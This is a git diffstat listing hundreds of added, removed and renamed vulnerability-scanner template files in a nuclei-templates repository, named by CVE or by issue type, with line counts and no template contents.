- nuclei-templates/CVE-2022/CVE-2022-32409.yaml | 31 - nuclei-templates/CVE-2022/CVE-2022-33119.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-34047.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-35416.yaml | 39 - nuclei-templates/CVE-2022/CVE-2022-35914.yaml | 46 - nuclei-templates/CVE-2022/CVE-2022-36883.yaml | 27 - nuclei-templates/CVE-2022/cve-2022-0165.yaml | 29 + nuclei-templates/CVE-2022/cve-2022-0201.yaml | 38 + ...{CVE-2022-0218.yaml => cve-2022-0218.yaml} | 0 
nuclei-templates/CVE-2022/cve-2022-0288.yaml | 50 - nuclei-templates/CVE-2022/cve-2022-0422.yaml | 50 - nuclei-templates/CVE-2022/cve-2022-0482.yaml | 57 + nuclei-templates/CVE-2022/cve-2022-0540.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-0543.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-0653.yaml | 42 - nuclei-templates/CVE-2022/cve-2022-0776.yaml | 40 - nuclei-templates/CVE-2022/cve-2022-0870.yaml | 54 + ...{CVE-2022-0921.yaml => cve-2022-0921.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-1040.yaml | 48 - nuclei-templates/CVE-2022/cve-2022-1119.yaml | 40 - nuclei-templates/CVE-2022/cve-2022-1221.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-1388.yaml | 27 - nuclei-templates/CVE-2022/cve-2022-1392.yaml | 38 + nuclei-templates/CVE-2022/cve-2022-1609.yaml | 39 - nuclei-templates/CVE-2022/cve-2022-1904.yaml | 42 + nuclei-templates/CVE-2022/cve-2022-1906.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-21500.yaml | 51 - nuclei-templates/CVE-2022/cve-2022-2187.yaml | 43 + nuclei-templates/CVE-2022/cve-2022-22536.yaml | 61 + nuclei-templates/CVE-2022/cve-2022-22972.yaml | 106 + nuclei-templates/CVE-2022/cve-2022-23131.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-23134.yaml | 43 + nuclei-templates/CVE-2022/cve-2022-23779.yaml | 61 - nuclei-templates/CVE-2022/cve-2022-23881.yaml | 37 + ...VE-2022-23944.yaml => cve-2022-23944.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-24112.yaml | 80 + nuclei-templates/CVE-2022/cve-2022-24129.yaml | 37 + nuclei-templates/CVE-2022/cve-2022-24181.yaml | 46 - nuclei-templates/CVE-2022/cve-2022-24260.yaml | 49 - nuclei-templates/CVE-2022/cve-2022-2486.yaml | 41 - nuclei-templates/CVE-2022/cve-2022-2487.yaml | 55 - nuclei-templates/CVE-2022/cve-2022-26134.yaml | 50 + nuclei-templates/CVE-2022/cve-2022-26135.yaml | 32 - nuclei-templates/CVE-2022/cve-2022-26138.yaml | 42 - nuclei-templates/CVE-2022/cve-2022-26148.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-26159.yaml | 40 + nuclei-templates/CVE-2022/cve-2022-26233.yaml | 34 + 
nuclei-templates/CVE-2022/cve-2022-26960.yaml | 40 + nuclei-templates/CVE-2022/cve-2022-27927.yaml | 44 + nuclei-templates/CVE-2022/cve-2022-28079.yaml | 45 - nuclei-templates/CVE-2022/cve-2022-28080.yaml | 72 + nuclei-templates/CVE-2022/cve-2022-28219.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-29014.yaml | 38 + nuclei-templates/CVE-2022/cve-2022-29298.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-29383.yaml | 46 + nuclei-templates/CVE-2022/cve-2022-29548.yaml | 44 + nuclei-templates/CVE-2022/cve-2022-30776.yaml | 45 - nuclei-templates/CVE-2022/cve-2022-31268.yaml | 48 + nuclei-templates/CVE-2022/cve-2022-31373.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-32015.yaml | 35 + nuclei-templates/CVE-2022/cve-2022-32022.yaml | 51 - nuclei-templates/CVE-2022/cve-2022-32025.yaml | 54 - nuclei-templates/CVE-2022/cve-2022-32026.yaml | 54 + ...VE-2022-32159.yaml => cve-2022-32159.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-32409.yaml | 38 + nuclei-templates/CVE-2022/cve-2022-33119.yaml | 40 - nuclei-templates/CVE-2022/cve-2022-34047.yaml | 45 + nuclei-templates/CVE-2022/cve-2022-35416.yaml | 46 + nuclei-templates/CVE-2022/cve-2022-36883.yaml | 38 + nuclei-templates/CVE-2023/CVE-2023-23752.yaml | 35 - nuclei-templates/CVE-2023/CVE-2023-35047.yaml | 56 + nuclei-templates/CVE-2023/CVE-2023-3836.yaml | 68 - nuclei-templates/CVE-2023/Cve-2023-23752.yaml | 57 + .../CVE-2024-1561.yaml} | 0 ...ve-2024-23897.yaml => CVE-2024-23897.yaml} | 0 nuclei-templates/CVE-2024/CVE-2024-38693.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-38856.yaml | 2 +- nuclei-templates/CVE-2024/CVE-2024-39641.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39642.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39643.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39646.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39647.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39648.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39649.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39651.yaml | 59 + 
nuclei-templates/CVE-2024/CVE-2024-39652.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39653.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39655.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39656.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39658.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39659.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39660.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39661.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39663.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39664.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39665.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-39668.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-40422.yaml | 66 + nuclei-templates/CVE-2024/CVE-2024-41628.yaml | 61 + nuclei-templates/CVE-2024/CVE-2024-5057.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5226.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5668.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5975.yaml | 58 + nuclei-templates/CVE-2024/CVE-2024-6254.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6552.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6824.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6869.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6987.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7008.yaml | 39 + nuclei-templates/CVE-2024/CVE-2024-7150.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7350.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7486.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7492.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7548.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7560.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7561.yaml | 59 + nuclei-templates/Other/0x71rex-blind-xss.yaml | 30 - nuclei-templates/Other/0xlfi3.yaml | 29 + nuclei-templates/Other/0xlfifuzz1.yaml | 38 + .../2021-20837.yaml} | 0 .../Other/3cx-management-console-1.yaml | 4 + .../Other/3g-wireless-gateway-6.yaml | 5 +- nuclei-templates/Other/44 - T9.yaml | 36 + nuclei-templates/Other/74cms-sqli-10.yaml | 27 + 
nuclei-templates/Other/74cms-sqli.yaml | 15 - .../{aic-leakage.yaml => AIC-leakage.yaml} | 0 ...kpass.yaml => APACHE-Ambari-weakPass.yaml} | 0 nuclei-templates/Other/API-Linkfinder.yaml | 19 + nuclei-templates/Other/ASUSTOR-ADM-sqli.yaml | 25 - nuclei-templates/Other/ATHD-DVR-fileRead.yaml | 20 + ...ebaccess.yaml => Advantech-WebAccess.yaml} | 0 .../Other/Alibaba-Anyproxy-fileRead.yaml | 23 - ...pereo-cas-rce.yaml => Apereo-Cas-rce.yaml} | 0 ...builder-sqli.yaml => B2BBuilder-sqli.yaml} | 0 nuclei-templates/Other/BOA-Web-fileRead.yaml | 23 + ...tric-detect.yaml => Biometric-detect.yaml} | 0 nuclei-templates/Other/Bitrix_check_env.yaml | 24 - nuclei-templates/Other/BlindSQL.yaml | 35 + .../Other/CL-TE-http-smuggling.yaml | 35 + nuclei-templates/Other/CNVD-2019-17294.yaml | 32 + nuclei-templates/Other/CNVD-2020-56167.yaml | 25 - nuclei-templates/Other/CNVD-2021-14536.yaml | 8 +- nuclei-templates/Other/CNVD-2021-17369.yaml | 33 - ...1-28277-1107.yaml => CNVD-2021-28277.yaml} | 0 nuclei-templates/Other/CNVD-2021-49104.yaml | 6 +- nuclei-templates/Other/CRMEB-sqli.yaml | 18 + .../CVE_2023_49442.yaml} | 0 nuclei-templates/Other/Cache_to_xss.yaml | 72 + ...en-fileread.yaml => DIAOWEN-fileRead.yaml} | 0 ..._Sqli.yaml => Dahua_Video_FileUpload.yaml} | 0 ...-database.yaml => E-message-database.yaml} | 0 .../Other/GCP-service-account.yaml | 4 +- .../Other/GLPI-9.3.3-SQL-Injection.yaml | 25 - ...-rpc-rce.yaml => Hadoop-Yarn-RPC-RCE.yaml} | 0 ...Hikvision_iVMS-8700_Fileupload_Files.yaml} | 0 ...n.yaml => Hikvision_iVMS-8700_upload.yaml} | 0 ...wms-fileread.yaml => JEEWMS-fileRead.yaml} | 0 .../Other/Karel-ip-phone-lfi.yaml | 10 +- .../Landray OA treexml.tmpl Script RCE.yaml | 46 + .../Other/MinIO-default-login.yaml | 29 - .../{mobileiron(1).yaml => MobileIron.yaml} | 0 ...ead.yaml => NETSurveillance-fileRead.yaml} | 0 .../Other/Nsfocus_NF_Firewall_FileUpload.yaml | 28 + nuclei-templates/Other/Nsfocus_sas_Exec.yaml | 49 - .../Other/Panabit-sy_addmount-rce.yaml | 22 + 
.../Other/{0xlfi.yaml => Path-Traversal.yaml} | 0 ...Default-Login.yaml => RedMine-Detect.yaml} | 0 ...yaml => Ruijie_NBR_Router_fileupload.yaml} | 0 .../Other/SQLInjection_ERROR.yaml | 51 - .../Other/{sitecore.yaml => SiteCore.yaml} | 0 .../Other/Springboot-Loggers.yaml | 36 + .../Other/Symantec-Messaging-Gateway.yaml | 19 + nuclei-templates/Other/WP-Vault-LFI.yaml | 33 + .../Other/WooYun-2015-148227.yaml | 25 + .../Other/{X-Host .yaml => X-Host.yaml} | 0 .../{X-Remote-IP.yaml => X-Remote-IP .yaml} | 0 ...b-server-12.yaml => abyss-web-server.yaml} | 0 ...yaml => accent-microcomputers-lfi-14.yaml} | 0 nuclei-templates/Other/access-log-21.yaml | 3 + .../Other/acemanager-login-25.yaml | 40 - nuclei-templates/Other/acemanager-login.yaml | 37 + .../Other/{acme-xss.yaml => acme-xss-28.yaml} | 0 .../Other/acontent-detect-32.yaml | 26 - .../Other/acontent-detect-33.yaml | 26 + ...-takeover-35.yaml => acquia-takeover.yaml} | 0 ...ard-38.yaml => acrolinx-dashboard-37.yaml} | 0 ...ure-43.yaml => active-admin-exposure.yaml} | 0 ...46.yaml => activemq-default-login-48.yaml} | 0 nuclei-templates/Other/activemq-panel-53.yaml | 26 + nuclei-templates/Other/activemq-panel.yaml | 28 - nuclei-templates/Other/acunetix-panel-54.yaml | 23 + nuclei-templates/Other/acunetix-panel-59.yaml | 30 - nuclei-templates/Other/ad-widget-lfi-126.yaml | 15 +- .../Other/adb-backup-enabled-60.yaml | 23 - .../Other/adb-backup-enabled-61.yaml | 16 + ...4.yaml => addeventlistener-detect-65.yaml} | 0 .../Other/adiscon-loganalyzer-67.yaml | 29 + .../Other/adiscon-loganalyzer-70.yaml | 39 - nuclei-templates/Other/adminer-panel-74.yaml | 50 - nuclei-templates/Other/adminer-panel-75.yaml | 51 + ...nset-panel-80.yaml => adminset-panel.yaml} | 0 .../Other/adobe-component-login-89.yaml | 31 + .../Other/adobe-component-login-91.yaml | 20 - .../Other/adobe-component-login-92.yaml | 22 + .../Other/adobe-component-login.yaml | 32 - .../Other/adobe-connect-central-login-96.yaml | 30 + 
.../Other/adobe-connect-central-login-97.yaml | 23 - ...on.yaml => adobe-connect-version-104.yaml} | 0 .../adobe-experience-manager-login-109.yaml | 30 - .../Other/adobe-experience-manager-login.yaml | 23 + ...r-112.yaml => adobe-media-server-110.yaml} | 0 .../advanced-access-manager-lfi-116.yaml | 25 - .../advanced-access-manager-lfi-118.yaml | 29 + .../Other/aem-cached-pages-130.yaml | 24 - nuclei-templates/Other/aem-cached-pages.yaml | 25 + ...rx-bypass.yaml => aem-crx-bypass-133.yaml} | 0 .../Other/aem-default-get-servlet-135.yaml | 160 +- .../Other/aem-default-login-140.yaml | 59 + .../Other/aem-default-login-142.yaml | 65 - ...ection-146.yaml => aem-detection-145.yaml} | 0 ...vlet-150.yaml => aem-gql-servlet-149.yaml} | 0 nuclei-templates/Other/aem-groovyconsole.yaml | 28 - .../Other/aem-hash-querybuilder-159.yaml | 30 + .../Other/aem-hash-querybuilder-161.yaml | 28 - .../Other/aem-jcr-querybuilder-166.yaml | 7 +- .../Other/aem-login-status-170.yaml | 29 - .../Other/aem-login-status-171.yaml | 30 + ...ml => aem-merge-metadata-servlet-174.yaml} | 0 nuclei-templates/Other/aem-misconfig.yaml | 31 + ...=> aem-querybuilder-feed-servlet-175.yaml} | 0 ...m-querybuilder-internal-path-read-179.yaml | 24 - ...m-querybuilder-internal-path-read-180.yaml | 30 + .../aem-querybuilder-json-servlet-182.yaml | 41 - .../aem-querybuilder-json-servlet-185.yaml | 30 + ...s-188.yaml => aem-setpreferences-xss.yaml} | 0 .../Other/aem-userinfo-servlet-190.yaml | 32 + .../Other/aem-userinfo-servlet.yaml | 25 - .../aem-wcm-suggestions-servlet-194.yaml | 27 + .../aem-wcm-suggestions-servlet-196.yaml | 26 - .../Other/aem-xss-childlist-selector-198.yaml | 7 + nuclei-templates/Other/aem_misconfig.yaml | 33 - ...01.yaml => aerohive-netconfig-ui-199.yaml} | 0 .../Other/aftership-takeover-204.yaml | 15 - .../Other/aftership-takeover-205.yaml | 19 + .../Other/agilecrm-takeover-211.yaml | 5 +- nuclei-templates/Other/aha-takeover-217.yaml | 15 + nuclei-templates/Other/aha-takeover.yaml | 16 - 
...aml => aims-password-mgmt-client-221.yaml} | 0 .../Other/aims-password-portal-222.yaml | 22 - .../Other/aims-password-portal.yaml | 32 + .../Other/airee-takeover-226.yaml | 16 - .../Other/airee-takeover-228.yaml | 19 + .../airflow-configuration-exposure-230.yaml | 18 + .../Other/airflow-configuration-exposure.yaml | 16 - ...flow-debug-231.yaml => airflow-debug.yaml} | 0 .../Other/airflow-detect-239.yaml | 27 - nuclei-templates/Other/airflow-detect.yaml | 24 + ...horized.yaml => airflow-unauthorized.yaml} | 0 .../Other/akamai-cloudtest-252.yaml | 31 - .../Other/akamai-cloudtest-253.yaml | 24 + .../Other/alfacgiapi-wordpress-255.yaml | 2 + .../Other/alibaba-anyproxy-fileread.yaml | 26 + .../Other/alibaba-canal-info-leak-266.yaml | 35 - .../Other/alibaba-canal-info-leak.yaml | 35 + ...68.yaml => alibaba-mongoshake-unauth.yaml} | 0 .../Other/alienvault-usm-274.yaml | 10 +- .../Other/alphaweb-default-login-277.yaml | 43 + .../Other/alphaweb-default-login.yaml | 30 - .../Other/amazon-docker-config-280.yaml | 18 + .../Other/amazon-docker-config.yaml | 16 - .../Other/amazon-mws-auth-token-11845.yaml | 24 + .../Other/amazon-mws-auth-token-value.yaml | 13 - .../Other/ambari-default-credentials-285.yaml | 20 - .../Other/ambari-default-credentials.yaml | 18 + .../Other/ambari-default-login-289.yaml | 4 +- .../Other/ambari-exposure-293.yaml | 16 + .../Other/ambari-exposure-294.yaml | 24 - nuclei-templates/Other/amcrest-login-297.yaml | 9 +- ...n-301.yaml => ametys-admin-login-300.yaml} | 0 .../Other/amministrazione-aperta-lfi-303.yaml | 21 + .../Other/amministrazione-aperta-lfi.yaml | 28 - .../Other/ampps-admin-panel-304.yaml | 40 - .../Other/ampps-admin-panel-305.yaml | 43 + nuclei-templates/Other/ampps-panel.yaml | 5 + .../Other/{AMSS-sqli.yaml => amss-sqli.yaml} | 0 .../android-debug-database-exposed-315.yaml | 23 - .../Other/android-debug-database-exposed.yaml | 24 + .../Other/anima-takeover-318.yaml | 18 - .../Other/anima-takeover-319.yaml | 19 + ...leDownload.yaml => 
anni-filedownload.yaml} | 0 .../Other/announcekit-takeover-322.yaml | 28 + .../Other/announcekit-takeover-324.yaml | 25 - .../Other/ansible-config-disclosure-326.yaml | 18 - .../Other/ansible-config-disclosure.yaml | 16 + ...-327.yaml => ansible-semaphore-panel.yaml} | 0 ...e-329.yaml => ansible-tower-exposure.yaml} | 0 .../Other/antsword-backdoor-334.yaml | 24 - .../Other/antsword-backdoor-335.yaml | 31 + ...eakPass.yaml => aolynkbr304-weakpass.yaml} | 0 .../Other/apache-apisix-panel-338.yaml | 10 +- .../Other/apache-axis-detect-339.yaml | 32 - .../Other/apache-axis-detect.yaml | 35 + .../Other/apache-cocoon-detect-342.yaml | 26 + .../Other/apache-cocoon-detect.yaml | 27 - nuclei-templates/Other/apache-detect-346.yaml | 30 - nuclei-templates/Other/apache-detect-347.yaml | 31 + .../Other/apache-filename-enum-354.yaml | 27 - .../Other/apache-filename-enum.yaml | 30 + .../Other/apache-flink-unauth-rce-356.yaml | 41 + .../Other/apache-flink-unauth-rce-359.yaml | 43 - .../Other/apache-ofbiz-log4j-rce-366.yaml | 44 + .../Other/apache-ofbiz-log4j-rce.yaml | 28 - .../Other/apache-solr-file-read.yaml | 44 + .../Other/apache-solr-log4j-rce-372.yaml | 43 - .../Other/apache-solr-log4j-rce.yaml | 31 + .../Other/apache-tomcat-CVE-2022-34305.yaml | 19 - .../Other/apache-tomcat-cve-2022-34305.yaml | 21 + .../Other/apache-tomcat-snoop-375.yaml | 7 +- nuclei-templates/Other/apc-ups-login-382.yaml | 24 + nuclei-templates/Other/apc-ups-login.yaml | 25 - .../{apc-info-378.yaml => apc_info.yaml} | 0 .../Other/api-adafruit-io-387.yaml | 22 + nuclei-templates/Other/api-adafruit-io.yaml | 24 - .../Other/api-apigee-edge-391.yaml | 26 + nuclei-templates/Other/api-apigee-edge.yaml | 29 - nuclei-templates/Other/api-appveyor-392.yaml | 23 - nuclei-templates/Other/api-appveyor.yaml | 25 + nuclei-templates/Other/api-bible-394.yaml | 24 - nuclei-templates/Other/api-bible.yaml | 28 + nuclei-templates/Other/api-bitrise-397.yaml | 24 - nuclei-templates/Other/api-bitrise.yaml | 28 + 
.../Other/api-blockchain-398.yaml | 33 + nuclei-templates/Other/api-blockchain.yaml | 27 - nuclei-templates/Other/api-buildkite.yaml | 25 - nuclei-templates/Other/api-buttercms-403.yaml | 16 - nuclei-templates/Other/api-calendly.yaml | 25 - nuclei-templates/Other/api-clearbit-407.yaml | 24 + nuclei-templates/Other/api-clearbit.yaml | 28 - nuclei-templates/Other/api-coinapi-408.yaml | 24 + nuclei-templates/Other/api-coinapi.yaml | 28 - .../Other/api-cooperhewitt-409.yaml | 12 +- nuclei-templates/Other/api-dbt-413.yaml | 24 + nuclei-templates/Other/api-dbt.yaml | 26 - nuclei-templates/Other/api-debounce-414.yaml | 22 + nuclei-templates/Other/api-debounce.yaml | 25 - .../Other/api-deviantart-415.yaml | 18 + nuclei-templates/Other/api-deviantart.yaml | 21 - nuclei-templates/Other/api-dribbble-416.yaml | 21 - nuclei-templates/Other/api-dribbble-417.yaml | 21 + nuclei-templates/Other/api-dropbox-418.yaml | 24 - nuclei-templates/Other/api-dropbox.yaml | 24 + nuclei-templates/Other/api-europeana-419.yaml | 12 +- nuclei-templates/Other/api-facebook-422.yaml | 22 + nuclei-templates/Other/api-facebook.yaml | 25 - nuclei-templates/Other/api-fastly-423.yaml | 25 + nuclei-templates/Other/api-fastly-424.yaml | 21 - .../Other/api-fontawesome-426.yaml | 26 + nuclei-templates/Other/api-fontawesome.yaml | 29 - nuclei-templates/Other/api-github-429.yaml | 18 + nuclei-templates/Other/api-github.yaml | 24 - nuclei-templates/Other/api-gitlab.yaml | 12 +- .../Other/api-google-drive-432.yaml | 20 + nuclei-templates/Other/api-google-drive.yaml | 23 - nuclei-templates/Other/api-heroku-435.yaml | 25 + nuclei-templates/Other/api-heroku.yaml | 25 - nuclei-templates/Other/api-hubspot-437.yaml | 18 + .../Other/api-iconfinder-438.yaml | 28 - .../Other/api-iconfinder-439.yaml | 28 + nuclei-templates/Other/api-instatus-442.yaml | 25 - nuclei-templates/Other/api-instatus.yaml | 29 + nuclei-templates/Other/api-iterable-445.yaml | 20 + nuclei-templates/Other/api-jumpcloud-446.yaml | 13 +- 
.../{api-leanix-450.yaml => api-leanix.yaml} | 0 nuclei-templates/Other/api-linkedin-451.yaml | 25 - nuclei-templates/Other/api-linkedin.yaml | 28 + nuclei-templates/Other/api-linkfinder.yaml | 22 - ...pi-malshare-456.yaml => api-malshare.yaml} | 0 .../Other/api-malwarebazaar-458.yaml | 2 +- nuclei-templates/Other/api-mapbox-465.yaml | 16 + nuclei-templates/Other/api-mojoauth-466.yaml | 24 - nuclei-templates/Other/api-mojoauth.yaml | 28 + nuclei-templates/Other/api-npm-471.yaml | 23 + nuclei-templates/Other/api-onelogin-472.yaml | 25 + nuclei-templates/Other/api-onelogin.yaml | 27 - .../Other/api-openweather-473.yaml | 23 - nuclei-templates/Other/api-pagerduty-475.yaml | 19 - nuclei-templates/Other/api-pastebin-477.yaml | 24 + nuclei-templates/Other/api-pastebin.yaml | 28 - nuclei-templates/Other/api-paypal-478.yaml | 25 - nuclei-templates/Other/api-paypal.yaml | 28 + nuclei-templates/Other/api-petfinder-480.yaml | 27 - nuclei-templates/Other/api-petfinder.yaml | 31 + .../Other/api-pivotaltracker.yaml | 5 - nuclei-templates/Other/api-postmark.yaml | 18 - nuclei-templates/Other/api-quip-484.yaml | 23 + nuclei-templates/Other/api-quip.yaml | 27 - ...ksmuseum.yaml => api-rijksmuseum-485.yaml} | 0 nuclei-templates/Other/api-sendgrid-489.yaml | 8 +- nuclei-templates/Other/api-slack.yaml | 19 + nuclei-templates/Other/api-spotify-495.yaml | 20 +- nuclei-templates/Other/api-square-496.yaml | 25 - nuclei-templates/Other/api-sslmate-497.yaml | 25 - nuclei-templates/Other/api-sslmate.yaml | 28 + nuclei-templates/Other/api-stytch-500.yaml | 27 + nuclei-templates/Other/api-stytch.yaml | 31 - ...-thecatapi-503.yaml => api-thecatapi.yaml} | 0 nuclei-templates/Other/api-travisci-506.yaml | 8 +- nuclei-templates/Other/api-twitter.yaml | 19 - ...-urlscan-508.yaml => api-urlscan-509.yaml} | 0 ...irustotal.yaml => api-virustotal-512.yaml} | 0 .../Other/api-visualstudio-513.yaml | 20 - nuclei-templates/Other/api-weglot-516.yaml | 24 - nuclei-templates/Other/api-weglot.yaml | 24 + 
nuclei-templates/Other/api-wordcloud.yaml | 2 +- .../Other/apisix-default-login.yaml | 8 +- .../Other/apollo-adminservice.yaml | 24 + .../Other/apollo-default-login-520.yaml | 57 - .../Other/apollo-default-login-521.yaml | 51 + .../Other/apple-app-site-association-524.yaml | 6 +- .../Other/appspec-yml-disclosure-527.yaml | 25 - .../Other/appspec-yml-disclosure.yaml | 28 + ...s-panel-530.yaml => arcgis-panel-531.yaml} | 0 ...rest-api.yaml => arcgis-rest-api-533.yaml} | 0 ...d-login-536.yaml => argocd-login-534.yaml} | 0 .../Other/arl-default-login-539.yaml | 44 - nuclei-templates/Other/arl-default-login.yaml | 31 + .../Other/artica-web-proxy-detect-543.yaml | 22 + .../Other/artica-web-proxy-detect.yaml | 18 - ...yaml => artifactory-anonymous-deploy.yaml} | 0 .../Other/asanhamayesh-lfi-552.yaml | 21 + .../Other/asanhamayesh-lfi-553.yaml | 28 - .../Other/aspnuke-openredirect-554.yaml | 4 +- .../Other/aspose-file-download-561.yaml | 28 + .../Other/aspose-file-download.yaml | 23 - ...yaml => aspose-pdf-file-download-566.yaml} | 0 .../Other/aspose-words-file-download-571.yaml | 29 + .../Other/aspose-words-file-download.yaml | 25 - .../Other/aspx-debug-mode-578.yaml | 3 +- nuclei-templates/Other/asustor-adm-sqli.yaml | 29 + nuclei-templates/Other/athd-dvr-fileread.yaml | 22 - .../Other/atlassian-crowd-panel-581.yaml | 19 + .../Other/atlassian-crowd-panel-585.yaml | 25 - .../Other/attitude-theme-open-redirect.yaml | 3 +- ...e-login-591.yaml => atvise-login-590.yaml} | 0 .../Other/autobahn-python-detect-595.yaml | 30 - .../Other/autobahn-python-detect.yaml | 29 + ...ct-596.yaml => automation-direct-597.yaml} | 0 .../Other/avantfax-detect-598.yaml | 31 + .../Other/avantfax-detect-600.yaml | 24 - .../Other/avantfax-panel-601.yaml | 41 - .../Other/avantfax-panel-603.yaml | 32 + ...l => avatier-password-management-605.yaml} | 0 nuclei-templates/Other/aviatrix-panel.yaml | 9 +- ...ml => avtech-avn801-camera-panel-612.yaml} | 0 .../Other/aws-access-key-value-621.yaml | 18 + 
.../Other/aws-access-key-value-622.yaml | 24 - .../Other/aws-bucket-takeover-630.yaml | 20 - .../Other/aws-bucket-takeover-631.yaml | 25 + .../Other/aws-cloudfront-service-635.yaml | 2 +- ...=> aws-ecs-container-agent-tasks-640.yaml} | 0 .../aws-elastic-beanstalk-detect-644.yaml | 31 + .../Other/aws-elastic-beanstalk-detect.yaml | 30 - ...g-648.yaml => aws-object-listing-645.yaml} | 0 nuclei-templates/Other/aws-redirect-651.yaml | 24 + nuclei-templates/Other/aws-redirect-654.yaml | 24 - ...onfig-656.yaml => awstats-config-655.yaml} | 0 ...ts-script.yaml => awstats-script-658.yaml} | 0 .../Other/axigen-webadmin-659.yaml | 13 +- .../Other/axigen-webmail-662.yaml | 24 - .../Other/axigen-webmail-664.yaml | 40 + .../axiom-digitalocean-key-exposure-666.yaml | 28 + .../axiom-digitalocean-key-exposure.yaml | 35 - .../Other/azkaban-default-login-671.yaml | 4 +- ...lient-679.yaml => azkaban-web-client.yaml} | 0 .../Other/azure-takeover-detection-681.yaml | 32 +- nuclei-templates/Other/bak.yaml | 22 - .../Other/{bash.yaml => bash-scanner.yaml} | 0 ...ion.yaml => basic-auth-detection-687.yaml} | 0 .../Other/basic-xss-prober-696.yaml | 36 + nuclei-templates/Other/basic-xss-prober.yaml | 31 - nuclei-templates/Other/basic_sqli.yaml | 47 + nuclei-templates/Other/bazarr-login.yaml | 3 +- nuclei-templates/Other/bems-api-lfi-711.yaml | 24 - nuclei-templates/Other/bems-api-lfi.yaml | 20 + .../Other/beward-ipcamera-disclosure.yaml | 9 +- .../Other/beyondtrust-login-server-719.yaml | 31 - .../Other/beyondtrust-login-server.yaml | 31 + nuclei-templates/Other/beyondtrust-panel.yaml | 4 +- .../Other/bigbluebutton-login-725.yaml | 28 - .../Other/bigbluebutton-login-726.yaml | 34 + ...eover.yaml => bigcartel-takeover-728.yaml} | 0 .../bigip-config-utility-detect-733.yaml | 33 - .../Other/bigip-config-utility-detect.yaml | 34 + ...etection-735.yaml => bigip-detection.yaml} | 0 .../Other/{api-bitly-396.yaml => bitly.yaml} | 0 .../Other/bitrix-open-redirect-743.yaml | 40 + 
.../Other/bitrix-open-redirect-744.yaml | 40 - nuclei-templates/Other/bitrix-panel-748.yaml | 34 - nuclei-templates/Other/bitrix-panel-750.yaml | 27 + nuclei-templates/Other/bitrix_bak_check.yaml | 22 + nuclei-templates/Other/blind-xss.yaml | 61 + ...ogin-751.yaml => blue-iris-login-754.yaml} | 0 .../Other/blue-ocean-excellence-lfi-755.yaml | 25 - .../Other/blue-ocean-excellence-lfi-758.yaml | 27 + nuclei-templates/Other/boa-web-fileread.yaml | 25 - .../Other/bolt-cms-panel-763.yaml | 38 + nuclei-templates/Other/bolt-cms-panel.yaml | 37 - nuclei-templates/Other/bower-json-769.yaml | 31 - nuclei-templates/Other/bower-json-770.yaml | 31 + ...n.yaml => braintree-access-token-773.yaml} | 0 nuclei-templates/Other/branch-key-775.yaml | 3 +- .../Other/brandfolder-lfi-776.yaml | 25 - nuclei-templates/Other/brandfolder-lfi.yaml | 31 + .../Other/brandfolder-open-redirect-780.yaml | 23 + .../Other/brandfolder-open-redirect.yaml | 20 - ...t-790.yaml => brother-printer-detect.yaml} | 0 .../Other/browserless-debugger-794.yaml | 26 - .../Other/browserless-debugger-795.yaml | 25 + nuclei-templates/Other/buddy-panel-797.yaml | 27 + nuclei-templates/Other/buddy-panel.yaml | 26 - ...yaml => buffalo-config-injection-801.yaml} | 0 nuclei-templates/Other/buildkite.yaml | 25 + .../Other/bullwark-momentum-lfi-808.yaml | 29 - .../Other/bullwark-momentum-lfi.yaml | 29 + .../Other/burp-api-detect-812.yaml | 28 - nuclei-templates/Other/burp-api-detect.yaml | 26 + ...sinessintelligence-default-login-817.yaml} | 0 nuclei-templates/Other/buttercms.yaml | 23 + .../Other/cab-fare-calculator-lfi-819.yaml | 28 + .../Other/cab-fare-calculator-lfi.yaml | 21 - ...poisoning-821.yaml => cache_piossing.yaml} | 0 ...acti-detect.yaml => cacti-detect-826.yaml} | 0 ...{cacti-panel.yaml => cacti-panel-828.yaml} | 0 .../Other/caddy-open-redirect-837.yaml | 20 - .../Other/caddy-open-redirect.yaml | 17 + 